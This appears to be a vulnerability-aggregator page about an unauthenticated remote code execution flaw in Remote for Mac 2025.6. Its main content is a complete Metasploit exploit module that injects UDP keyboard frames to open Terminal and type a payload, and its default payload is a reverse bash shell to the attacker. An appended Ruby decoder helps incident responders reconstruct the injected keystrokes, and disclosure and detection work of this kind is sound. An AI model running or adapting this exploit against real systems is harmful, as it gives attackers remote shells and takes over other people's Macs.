Remote for Mac 2025.6 Unauthenticated UDP Keyboard RCE

Vulnerability Information

Vulnerability name: Remote for Mac 2025.6 Unauthenticated UDP Keyboard RCE

Vulnerability type: Command execution

Severity: High

Vulnerability description: The affected product is Remote for Mac 2025.6, an application that lets users control a Mac remotely. It is typically used for remote work or technical-support scenarios; through it, users can simulate keyboard and mouse input to control a remote Mac. The application sees some use both in enterprise environments and among individual users.

Vulnerability explanation: This is an unauthenticated remote command execution vulnerability. Its technical root cause is that, when the 'Allow unknown devices' setting is enabled, the application does not properly validate the origin of UDP packets, so an attacker can simulate keyboard input by sending crafted UDP packets and execute arbitrary commands on the target system without any authentication. Vulnerabilities of this kind usually result from oversights in input validation and authentication during development.

Impact analysis: The security risk of this vulnerability is extremely high. An attacker can use it to execute arbitrary commands on the target system, which may lead to full system compromise, data leakage, or service disruption. Because exploitation requires no authentication and can be triggered remotely over the network, an attacker could exploit it at scale and automatically. In addition, because the attack simulates keyboard input, it may produce visible effects on the target system, such as a Terminal window opening; this increases the chance that the attack is noticed, but it may also cause user mis-operation or data loss.

Product name: Remote for Mac

Affected version: 2025.6

Source: https://github.com/rapid7/metasploit-framework/blob/82c27249de137e90a5c4715564aae8940f55d81f/modules%2Fexploits%2Fosx%2Fmisc%2Fremote_for_mac_udp_rce.rb

Type: rapid7/metasploit-framework: GitHub issues

PoC Details


require 'json'
require 'socket'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Remote for Mac 2025.6 Unauthenticated UDP Keyboard RCE',
        'Description' => %q{
          This module exploits an unauthenticated remote code execution vulnerability in Remote for Mac 2025.6.
          When the "Allow unknown devices" setting is enabled, it is possible to simulate keyboard input via UDP packets
          without authentication. By sending a sequence of key presses, an attacker can open the Terminal and execute
          arbitrary shell commands, achieving code execution as the current user.

          Tested on macOS Mojave and Ventura.
        },
        'Author' => ['Chokri Hammedi'],
        'License' => MSF_LICENSE,
        'References' => [
          ['URL', 'https://packetstorm.news/files/id/196351/']
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, SCREEN_EFFECTS]
        },
        'Platform' => ['unix', 'osx'],
        'Arch' => ARCH_CMD,
        'Targets' => [['Remote for Mac 2025.6', {}]],
        'DefaultTarget' => 0,
        'DefaultPayload' => 'cmd/unix/reverse_bash',
        'DisclosureDate' => '2025-05-27'
      )
    )

    # The same port is used for the HTTP API check and for the UDP keyboard input path.
    register_options(
      [
        Opt::RHOSTS(),
        Opt::RPORT(49229),
        OptBool.new('SSL', [true, 'Use SSL for HTTP check', true]),
        OptString.new('TARGETURI', [true, 'Base URI path', '/'])
      ]
    )
  end

  # The HTTP API reports whether the service requires authentication. A 'requires.auth'
  # value of false corresponds to the "Allow unknown devices" setting described above.
  def check_auth_disabled?
    protocol = datastore['SSL'] ? 'https' : 'http'
    vprint_status("Checking authentication on #{protocol}://#{datastore['RHOSTS']}:#{datastore['RPORT']}#{datastore['TARGETURI']}api/getVersion")

    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(datastore['TARGETURI'], 'api', 'getVersion'),
        'ctype' => 'application/json',
        'ssl' => datastore['SSL'],
        'rport' => datastore['RPORT'],
        'rhost' => datastore['RHOSTS']
      })

      if res&.code == 200
        json = JSON.parse(res.body)
        if json['requires.auth'] == false
          print_good('Authentication is disabled. Target is vulnerable.')
          return true
        else
          print_error('Authentication is enabled. Exploit aborted.')
          return false
        end
      else
        print_error('Unexpected response from target')
        return false
      end
    rescue ::Rex::ConnectionError, JSON::ParserError => e
      print_error("Connection or parsing error: #{e.message}")
      return false
    end
  end

  def exploit
    unless check_auth_disabled?
      fail_with(Failure::NotVulnerable, 'Target requires authentication or is unreachable')
    end

    udp_port = datastore['RPORT']
    target_ip = datastore['RHOSTS']

    # Pre-recorded key press/release frames sent before the application name is typed.
    initial_packets_hex = [
      '07000200370001',
      '07000200370001',
      '060003002000',
      '07000200370000',
      '07000200370000'
    ]

    # Key press/release frames that submit the typed text; sent after the application
    # name and again after the payload.
    final_packets_hex = [
      '07000200240001',
      '07000200240000'
    ]

    udp_sock = UDPSocket.new
    udp_sock.connect(target_ip, udp_port)

    print_status('Simulating system keyboard input to open Terminal...')
    initial_packets_hex.each do |hexpkt|
      udp_sock.send([hexpkt].pack('H*'), 0)
      select(nil, nil, nil, 0.05) # short pause between frames
    end

    # Each character is sent as its own text frame: a fixed header followed by the UTF-16LE character.
    prefix = [0x06, 0x00, 0x03, 0x00].pack('C*')
    'terminal'.each_char do |ch|
      pkt = prefix + ch.encode('utf-16le').force_encoding('ASCII-8BIT')
      udp_sock.send(pkt, 0)
      select(nil, nil, nil, 0.1)
    end

    final_packets_hex.each do |hexpkt|
      udp_sock.send([hexpkt].pack('H*'), 0)
      select(nil, nil, nil, 0.1)
    end

    sleep(2) # give the Terminal window time to appear and take focus

    shell_cmd = payload.encoded
    print_status('Sending malicious payload to be executed...')

    shell_cmd.each_char do |ch|
      pkt = prefix + ch.encode('utf-16le').force_encoding('ASCII-8BIT')
      udp_sock.send(pkt, 0)
      select(nil, nil, nil, 0.1)
    end

    final_packets_hex.each do |hexpkt|
      udp_sock.send([hexpkt].pack('H*'), 0)
      select(nil, nil, nil, 0.1)
    end

    print_good('Payload sent. Awaiting session...')
  ensure
    udp_sock.close if udp_sock
  end
end
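As an added example (not code from the Metasploit module or from the vendor), a decoder for the UDP keyboard frames the PoC above sends, so an incident responder can reconstruct injected keystrokes from a capture of traffic to the Remote for Mac port. The frame layout (uint16 LE length, uint16 LE type, then a key-event or UTF-16LE text body), the keycode names, and all function names are assumptions inferred from the PoC bytes, not a documented protocol.

```ruby
# Added example, not part of the Metasploit module or the vendor's software: decodes the UDP
# keyboard frames the PoC emits so a capture of traffic to the Remote for Mac port can be
# reviewed during incident response. The layout below is an ASSUMPTION inferred from the PoC.
FRAME_KEY_EVENT = 0x0002 # body: keycode, 0x00, pressed (1) / released (0)
FRAME_TEXT      = 0x0003 # body: one UTF-16LE code unit
KEYCODE_NAMES = { 0x37 => 'Command', 0x24 => 'Return' }.freeze # macOS kVK_ codes seen in the PoC

# Decode one datagram payload into a hash; nil if it does not match the assumed layout.
def decode_frame(pkt)
  return nil if pkt.nil? || pkt.bytesize < 6
  len, type = pkt.unpack('vv') # uint16 LE length, uint16 LE frame type
  return nil unless len == pkt.bytesize
  case type
  when FRAME_KEY_EVENT
    return nil unless len == 7
    code, _pad, pressed = pkt.byteslice(4, 3).unpack('C3')
    { kind: :key, code: code, pressed: pressed == 1, name: KEYCODE_NAMES.fetch(code) { format('0x%02x', code) } }
  when FRAME_TEXT
    return nil unless len == 6
    { kind: :text, char: pkt.byteslice(4, 2).force_encoding('UTF-16LE').encode('UTF-8', invalid: :replace, undef: :replace) }
  end
end

# Replay payloads in capture order: returns the text typed into the focused application and a
# log of modifier chords and unrecognised frames, the evidence an analyst wants to see.
def reconstruct(datagrams)
  typed, log, held = ''.dup, [], []
  datagrams.each do |pkt|
    f = decode_frame(pkt)
    if f.nil?
      log << 'unrecognised frame'
    elsif f[:kind] == :key
      held = f[:pressed] ? held | [f[:name]] : held - [f[:name]]
      log << "#{f[:name]} #{f[:pressed] ? 'down' : 'up'}"
      typed << "\n" if f[:name] == 'Return' && f[:pressed]
    elsif held.empty?
      typed << f[:char]
    else
      log << "chord #{(held + [f[:char].inspect]).join('+')}" # text sent while a modifier is held
    end
  end
  { typed: typed, log: log }
end

# Constructed sample: the PoC's key sequence (modifier chord, "terminal", Return) as datagrams.
def sample_capture
  hex = %w[07000200370001 07000200370001 060003002000 07000200370000 07000200370000]
  pkts = hex.map { |h| [h].pack('H*') }
  'terminal'.each_char { |c| pkts << "\x06\x00\x03\x00".b + c.encode('UTF-16LE').b }
  pkts + %w[07000200240001 07000200240000].map { |h| [h].pack('H*') }
end
```

The unauthenticated input path exists only while the API reports 'requires.auth' as false, so the same /api/getVersion check the module performs doubles as a configuration audit for your own deployments.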



http://example.com/2025/07/28/github_1368636133/
Author: lianccc
Published on: July 28, 2025